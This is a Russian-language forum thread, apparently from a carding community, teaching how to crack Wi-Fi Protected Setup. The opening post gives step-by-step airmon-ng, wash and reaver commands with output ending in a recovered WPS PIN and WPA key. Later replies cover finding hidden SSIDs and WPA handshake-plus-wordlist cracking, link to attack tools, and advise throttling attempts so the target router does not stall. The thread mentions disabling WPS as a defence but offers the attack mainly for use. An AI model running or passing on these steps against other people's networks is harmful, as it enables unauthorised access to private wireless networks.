Учимся взломывать Wi-Fi Protected Setup

Aoox

Aoox

Carder
Messages
51
Reputation
8
Reaction score
15
Points
8
Всем привет!

В этой статьи будут показаны все тонкости взлома. Но для начала давайте немного теории.

Wi-Fi Protected Setup (WPS) – стандарт, предназначенный для полуавтоматического создания беспроводной домашней сети , созданный Wi-Fi Alliance . Официально запущен 8 января 2007 года.

Целью протокола WPS является упрощение процесса настройки беспроводной сети, поэтому изначально он назывался Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях, и как следствие, имеют сложности при осуществлении настроек. WPS автоматически обозначает имя сети и задает шифрование, для защиты от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.

Push Button Configuration (PBC) – кнопка при нажатии которой осуществляется авто-поиск устройств с поддержкой WPS и дальнейшее подключение к точке доступа (AP).
Для взлома нам потребуется backtrack 5 r1 скачать можно с официального сайта 8)
Итак, для начала посмотрим, какие беспроводные интерфейсы имеются.
пишем вот этот код)
airmon-ng

37caa037c784c9ef1d5b672ea65bcb80.png


Переводим интерфейс wlan1 в режим монитора (monitor mode).
пишем
airmon-ng start wlan1

2aa46fe9d6d56df2fdaa7c42a5f6bb14.png


После того как wi-fi интерфейс настроен, просмотрим wi-fi сети, которые находятся в зоне действия.
пишем в строке
airodump-ng mon0

e12926b08a95eeba47061cb4fb996588.png


Кстати, можно так же использовать программу wash. Она позволяет просматривать точки доступа (AP), на которых включен WPS.

дальше пишем 8)
wash -i mon0
--------------------------------------------------------------
Scanning for supported APS...

BC:AE:C5:71:D3:17 hub-lex-AP
84:C9:B2:4C:E0:57 1-OJ
00:24:01:1B:1F:B3 more
F0:7D:68:40:46:DE Okean
00:14:D1:E2:06:94 TRENDnet651
14:D6:4D:B5:07:4C DomTar

Закон нарушать мне не хочется, поэтому буду экспериментировать на своей AP.

reaver -i mon0 -b BC:AE:C5:71:D3:17 -vv
----------------------------------------------------------------------
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from BC:AE:C5:71:D3:17
[+] Associated with BC:AE:C5:71:D3:17 (ESSID: hub-lex-AP)
[+] 0.04% complete @ 2012-01-22 03:01:06 (5 seconds/attempt)
[+] 0.05% complete @ 2012-01-22 03:01:22 (6 seconds/attempt)

...

[+] 96.76% complete @ 2012-01-22 05:00:31 (4 seconds/attempt)
[+] 96.81% complete @ 2012-01-22 05:00:46 (4 seconds/attempt)
[+] 96.83% complete @ 2012-01-22 05:01:07 (4 seconds/attempt)
[+] 96.85% complete @ 2012-01-22 05:01:30 (4 seconds/attempt)
[+] 96.89% complete @ 2012-01-22 05:01:43 (4 seconds/attempt)
[+] 96.92% complete @ 2012-01-22 05:02:00 (4 seconds/attempt)
[+] 96.96% complete @ 2012-01-22 05:02:14 (4 seconds/attempt)
[+] 97.01% complete @ 2012-01-22 05:02:29 (4 seconds/attempt)
[+] 97.03% complete @ 2012-01-22 05:02:41 (4 seconds/attempt)
[+] 97.05% complete @ 2012-01-22 05:03:15 (4 seconds/attempt)
[+] 97.09% complete @ 2012-01-22 05:03:29 (4 seconds/attempt)
[+] 97.14% complete @ 2012-01-22 05:03:44 (4 seconds/attempt)
[+] WPS PIN: '31150545'
[+] WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7[STPO?tIK5k.M(V"k?P7X;jrcx'
[+] AP SSID: 'hub-lex-AP'
Как видите пароль был поставлен очень сложный, что не помешало добиться желаемого результата. Чтобы защититься от данного вида атаки, необходимо отключить службу WPS на роутере!
 
Last edited:
alendelon

alendelon

DEER
Messages
206
Reputation
18
Reaction score
25
Points
28
хорошая статья
только Backtrack 5 версии подходит или 2 или 3 версии тоже?
 
Сумрак

Сумрак

VIP member
Messages
808
Reputation
94
Reaction score
103
Points
43
хорошая статья
 
ViDoG

ViDoG

Professional
Messages
130
Reputation
28
Reaction score
39
Points
28
+1 за статью. Надо попробовать.
 
D

D1pl0maT

Member
Messages
5
Reputation
1
Reaction score
1
Points
3
ввожу airmon-ng но никакие варианты не предлагает( в чем проблема?

никаких wlan не находит... как так если я сижу в интернете через вафлю? Оо
 
alendelon

alendelon

DEER
Messages
206
Reputation
18
Reaction score
25
Points
28
зависит от wifi-карты, смотря какой чип встроен в карте...
я себе специально давно покупал Proxim Orrinoco с чипом Atheros..
 
D

D1pl0maT

Member
Messages
5
Reputation
1
Reaction score
1
Points
3
alendelon, а какой чип нужен? только Atheros?
 
xA! | Kill yourself

xA! | Kill yourself

Moderator
Messages
1,220
Reputation
211
Reaction score
270
Points
83
Aoox такой вопрос как взламываются сети, который используют WPA стандарт, а также если сеть не ведет своего вещания(SSID)?
 
alendelon

alendelon

DEER
Messages
206
Reputation
18
Reaction score
25
Points
28
xA! | Kill yourself said:
Aoox такой вопрос как взламываются сети, который используют WPA стандарт, а также если сеть не ведет своего вещания(SSID)?
Click to expand...


как я знаю только через Handshake + Wordlist (словарь)
 
xA! | Kill yourself

xA! | Kill yourself

Moderator
Messages
1,220
Reputation
211
Reaction score
270
Points
83
Tinytoon спс, но у него под линукс написано)
сейчас буду смотреть, что alendelon посоветовал

но на сколько я понял, что wpa ломается со словарем, т.е сложный пасс в принципе хрен подберешь т.к его в словаре не будет

ps интересуюсь не с целью атаки, а наоборот :) но инфы маловато
 
muravej

muravej

Professional
Messages
104
Reputation
32
Reaction score
56
Points
28
Спасибо за статью. На выходных буду экспериментировать)
 
Aoox

Aoox

Carder
Messages
51
Reputation
8
Reaction score
15
Points
8
xA! | Kill yourself said:
Tinytoon спс, но у него под линукс написано)
сейчас буду смотреть, что alendelon посоветовал

но на сколько я понял, что wpa ломается со словарем, т.е сложный пасс в принципе хрен подберешь т.к его в словаре не будет

ps интересуюсь не с целью атаки, а наоборот :) но инфы маловато
Click to expand...

ну в принципе есть еще методы атаки :D но по своему опыту скажу что мало кто устанавливает сильные пароли макс до 8 *) я попозже выложу еще пару атак на wifi :D:)

---------- Сообщение добавлено в 10:14 ---------- Предыдущее сообщение размещено в 09:50 ----------
xA! | Kill yourself said:
Aoox такой вопрос как взламываются сети, который используют WPA стандарт, а также если сеть не ведет своего вещания(SSID)?
Click to expand...
1)если сеть не ведет вещания то Эта защита обходится без проблем... Не помню как NetStumbler, но Kismet-у скрытый SSID не помеха так или иначе клиенты отваливаются и коннектятся заново, в этот момент и проскакивает EESID.:D:D:D
2) У Кельтоса классная статья рекомендую 8)

---------- Сообщение добавлено в 10:35 ---------- Предыдущее сообщение размещено в 10:14 ----------

В настоящее время WPS используется практически всеми популярными моделями Wi-Fi, что говорит о большом спектре воздействия с использованием данной уязвимости. Экспериментально, время, требуемое на организацию успешного взлома PIN-кода в среднем составляет от 4 до 10 часов.

Для эксплуатации данной уязвимости были разработаны две утилиты:
- http://code.google.com/p/reaver-wps/ (Reaver, есть бесплатная и платная версии)
- http://dl.dropbox.com/u/22108808/wpscrack.zip (по сути, PoC, работает не со всеми адаптерами)

Обе утилиты работают в режиме монитора. Очень важный момент состоит в том, чтобы не "зафлудить гг " объект атаки, чтобы Wi-Fi-роутер просто не подвис от нагрузки,) ограничивая число попыток в минут 8)
 
Last edited:
You must log in or register to reply here.

Similar threads

Father
Вебинар под руководством эксперта - раскрываем новейшие тактики DDoS и учимся давать отпор
Replies
0
Views
42
Father
Father
Bill Gates
Курс по разведке 2.0 . Учимся пользоваться гуглом , tor .
Replies
0
Views
911
Bill Gates
Bill Gates
eValidator
Flood is Флуд email - достучимся до каждого
Replies
0
Views
472
eValidator
eValidator
Shiza
Учимся пользоваться Cronos+
Replies
0
Views
556
Shiza
Shiza
xA! | Kill yourself
Учимся считать
Replies
16
Views
910
Sabnack
Sabnack
Top